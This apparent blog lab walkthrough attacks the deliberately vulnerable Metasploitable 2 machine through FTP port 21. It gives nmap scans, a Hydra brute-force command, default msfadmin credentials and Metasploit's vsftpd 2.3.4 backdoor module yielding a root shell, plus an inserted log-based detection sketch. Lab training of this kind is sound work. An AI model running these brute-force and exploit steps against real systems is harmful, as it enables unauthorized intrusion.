Cybertech Maven

Summary

This article provides a detailed guide on penetration testing by exploiting the FTP Port 21 on Metasploitable 2, a vulnerable virtual machine used for security training.

Abstract

The article "Penetration Testing Series: Hacking Metasploitable 2 By Exploiting FTP Port 21" delves into the educational process of compromising a system through its FTP service. It outlines the steps required to set up a lab environment using VirtualBox, Kali Linux, and Metasploitable 2, and then proceeds to demonstrate reconnaissance techniques, such as using ifconfig, netdiscover, and nmap, to identify the target system and open ports. The guide includes creating username and password lists for brute-force attacks, using tools like Hydra and Searchsploit to find and exploit vulnerabilities, and employing the Metasploit Framework to gain unauthorized access to the system. The author emphasizes the importance of understanding these tactics for educational purposes to enhance offensive security skills and develop robust defense mechanisms against potential cyber threats.

Opinions

  • The author stresses the educational intent of the article, aiming to empower security professionals and enthusiasts with knowledge on how to identify and secure systems against potential threats.
  • There is a clear disclaimer stating that all information provided is for educational purposes only, and the author cannot be held responsible for any misuse or damage caused by applying the techniques described.
  • The article promotes ethical hacking practices and underscores the necessity to obey all applicable local, state, and federal laws when using the tools and techniques discussed.
  • By providing a step-by-step approach to exploiting FTP Port 21, the author conveys the importance of hands-on practice in a controlled environment to understand and mitigate cybersecurity risks effectively.
  • The use of Metasploit Framework and other penetration testing tools is encouraged for enhancing offensive security skills, with the ultimate goal of improving defensive security measures.
  • The author invites readers to engage with the content by following them for more articles, leaving feedback, and even becoming contributors to "The Gray Area" for those interested in cybersecurity and computer science topics.

Penetration Testing Series: Hacking Metasploitable 2 By Exploiting FTP Port 21

Introduction

In this article, we delve into the intriguing realm of penetration testing by exploring the process of exploiting FTP Port 21 on the renowned vulnerable virtual machine, Metasploitable 2.

Metasploitable 2 is intentionally designed to be susceptible to various attacks and is a resource for security professionals to enhance their offensive security skills. By targeting Metasploitable 2’s vulnerable FTP service, we aim to provide an in-depth understanding of the techniques employed by ethical hackers and penetration testers to exploit and gain unauthorized access to systems.

FTP (File Transfer Protocol) is a widely used network protocol that facilitates the transfer of files between a client and a server over a computer network. While it remains an essential tool for data exchange, it also presents a potential avenue for attackers to breach a system. In this article, we focus on exploiting FTP Port 21, the default port FTP servers use for control and command operations.

Throughout this exploration, we will utilize the Metasploit Framework to illustrate how to take advantage of the vulnerabilities in the FTP service on Metasploitable 2 by employing commonly available modules and payloads. With this approach, we can access the target system without authorization.

It is important to emphasize that this article’s intent is solely educational and aimed at empowering security professionals and enthusiasts with knowledge on how to identify and secure their systems against potential threats. Understanding the tactics used by malicious actors is critical in developing robust defense mechanisms and implementing effective security measures.

Disclaimer:

All information, techniques, and tools described in this write-up are for educational purposes only. Use anything in this write-up at your discretion; I cannot be held responsible for any damages caused to any systems or yourselves legally. Using all tools and techniques described in this write-up for attacking individuals or organizations without their prior consent is highly illegal. You must obey all applicable local, state, and federal laws. I assume and accept no liability and will not be responsible for any misuse or damage caused by using the information herein.

Lab Setup

  • VirtualBox
  • Kali Linux Virtual Machine (VM)
  • Metasploitable 2 VM

Exploiting Metasploitable 2’s FTP Service: Gaining Unauthorized Access through Port 21

Part 1: Reconnaissance

To begin, we need to gather information about the target system. Follow these steps:

1. Use the “ifconfig” command to get the IP address of the Metasploitable 2 VM: 10.60.0.18.

ifconfig

2. In the Kali Linux VM, execute the “netdiscover” command to perform reconnaissance and find live hosts on the local network.

netdiscover -r 10.60.0.0/24

The netdiscover tool sends Address Resolution Protocol (ARP) requests to the network, allowing it to identify devices and their corresponding IP addresses. By listening to ARP replies, netdiscover can build a list of active hosts on the network and provide information such as IP addresses, MAC addresses, and device manufacturer details.

3. Note the IP address of the Metasploitable 2 VM (10.60.0.18) and its MAC address. Press “Ctrl + C” to exit netdiscover.

4. Use the “nmap” command to execute a network scan with specific options and save the output to “META2.txt.”

nmap -p- -sV -oN META2.txt 10.60.0.18

The Nmap scan results show that FTP Port 21 is open on the target system.

Part 2: Create Username and Password List

In this section, we will create our own username and password list. Follow these steps:

1. Use the “nano” command to create a username file called “Users.txt.”

nano Users.txt

2. Input the desired usernames in the “Users.txt” file.

3. View the “Users.txt” file using the “cat” command.

cat Users.txt

4. Copy the usernames for later use.

5. Use the “nano” command to create a password file called “Passwords.txt.”

nano Passwords.txt

6. Paste all the usernames into the “Passwords.txt” file.

7. Use the “cat” command to view the passwords in the “Passwords.txt” file.

cat Passwords.txt

Part 3: Exploit Open FTP Port 21

Now that we have gathered the necessary information, we can exploit the FTP service on the target system. Follow these steps:

1. We already know from the Nmap scan that FTP Port 21 is open, and the version of the FTP server is “vsftpd 2.3.4,” an older version with known vulnerabilities.

2. Use the “hydra” command to execute the Hydra tool and perform a brute-force attack on the FTP service of the target system (IP address: 10.60.0.18) using the created username and password list.

hydra -L Users.txt -P Passwords.txt 10.60.0.18 ftp

Hydra will iterate through the wordlists and attempt to find valid credentials. If successful, we can use these credentials to gain FTP access to the server.

3. Type the following command to initiate an FTP client session and connect to the FTP server on the IP address 10.60.0.18.

ftp 10.60.0.18

You can use any valid username and password combination from the successful Hydra results. We used “msfadmin” as the username and password in this case.

4. Congratulations! You have successfully gained unauthorized access to the Metasploitable 2 machine via FTP Port 21.

Name: msfadmin
Password: msfadmin
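
Seen from the server side, the Hydra run above leaves a recognizable trail: a burst of failed logins for many usernames from one client, followed by a success. The following detection sketch is an added example, not part of the original article; it assumes vsftpd's native log line format, and the sample log lines, usernames other than msfadmin, client addresses and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in vsftpd's native log format (not output from the article's lab).
SAMPLE_LOG = """\
Mon Jul 10 12:00:01 2023 [pid 4101] CONNECT: Client "10.60.0.5"
Mon Jul 10 12:00:02 2023 [pid 4100] [root] FAIL LOGIN: Client "10.60.0.5"
Mon Jul 10 12:00:02 2023 [pid 4104] [admin] FAIL LOGIN: Client "10.60.0.5"
Mon Jul 10 12:00:03 2023 [pid 4108] [user] FAIL LOGIN: Client "10.60.0.5"
Mon Jul 10 12:00:04 2023 [pid 4112] [service] FAIL LOGIN: Client "10.60.0.5"
Mon Jul 10 12:00:05 2023 [pid 4116] [msfadmin] OK LOGIN: Client "10.60.0.5"
Mon Jul 10 12:07:30 2023 [pid 4200] [backup] FAIL LOGIN: Client "10.60.0.9"
Mon Jul 10 12:09:11 2023 [pid 4203] [backup] OK LOGIN: Client "10.60.0.9"
"""

# timestamp, [pid N], [username], OK|FAIL LOGIN, client address
LINE = re.compile(r'^(\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
                  r'\[([^\]]*)\] (OK|FAIL) LOGIN: Client "([^"]+)"')

def detect_bruteforce(log_text, max_fails=4, window=timedelta(seconds=60)):
    """Return {client: alert} for clients with >= max_fails failures inside window.

    Each alert lists the usernames tried and any account that logged in
    successfully from that client after the burst (treat it as guessed)."""
    fails = defaultdict(list)   # client -> [(time, user)] of recent failures
    alerts = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue            # CONNECT, transfer and other lines
        ts = datetime.strptime(m.group(1), "%a %b %d %H:%M:%S %Y")
        user, result, client = m.group(2), m.group(3), m.group(4)
        if result == "FAIL":
            fails[client].append((ts, user))
            # Keep only failures that are still inside the sliding window.
            fails[client] = [(t, u) for t, u in fails[client] if ts - t <= window]
            if len(fails[client]) >= max_fails:
                alert = alerts.setdefault(client, {"users_tried": set(), "compromised": []})
                alert["users_tried"].update(u for _, u in fails[client])
        elif client in alerts and user not in alerts[client]["compromised"]:
            alerts[client]["compromised"].append(user)
    return alerts

if __name__ == "__main__":
    for client, alert in detect_bruteforce(SAMPLE_LOG).items():
        print(client, sorted(alert["users_tried"]), "-> logged in as:", alert["compromised"])
```

A single mistyped password followed by a success, as with the second client in the sample, stays below the threshold and raises no alert.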

Part 4: Searchsploit

Another way to exploit FTP Port 21 is using a tool called “Searchsploit.” Follow these steps:

1. Type “bye” to exit the FTP session.

2. Copy the FTP version information, “vsftpd 2.3.4.”

3. Use the “searchsploit” command to search for known exploits related to the specific version of the vsftpd FTP server software (2.3.4) in the Exploit Database (EDB).

searchsploit vsftpd 2.3.4

The searchsploit tool will display any known vulnerabilities associated with this version of FTP, including exploits such as backdoor command execution and others compatible with Metasploit.

Part 5: Metasploit

Metasploit is a robust framework for penetration testing and exploitation. Follow these steps to utilize Metasploit to gain access to the target system:

1. Type “msfconsole” to launch the Metasploit Framework command-line interface.

msfconsole

2. Use the “search” command followed by the FTP version to search for information within the Metasploit Framework related to the vsftpd 2.3.4 FTP server version.

search vsftpd 2.3.4

We received back one exploit, which matches the backdoor exploit found with Searchsploit.

3. Type “use 0” to select and use the backdoor exploit.

use 0

4. Type “show options” to view the required parameters that need to be set for the exploit.

show options

5. Fill in the required parameters, such as setting the RHOSTS (Remote Hosts) to the IP address of the target system (10.60.0.18).

6. Again, type “show options” to confirm that you have set the RHOSTS correctly.

set RHOSTS 10.60.0.18
show options

7. Finally, type “exploit” to execute the exploitation and gain access to the Metasploitable 2 machine via FTP Port 21.

exploit 

The exploit was successful: we now have a shell on the target system and can perform various actions.

If we type “whoami,” the response will be “root.”

When the command “ifconfig” is entered, the resulting output will display the IP address of the Metasploitable 2 virtual machine, indicated as 10.60.0.18.

8. To exit Metasploit, type the following commands:

Ctrl + C
y
exit

Conclusion

I appreciate you taking the time to read this article. Hopefully, the information presented has been helpful and valuable to you.

I aim to reach a wider audience and enlighten them about the potential risks of cyber-attacks, various types of penetration testing tools, and everything related to information technology.

If you would like to access more articles, please follow me.

Also, don’t hesitate to leave feedback or suggestions for future topics. Thanks again for your interest and support!

The Gray Area is a collection of great cybersecurity and computer science posts. Become a writer for The Gray Area by filling out this form! To get updates whenever The Gray Area publishes an article, check out our Twitter page, @TGAonMedium.
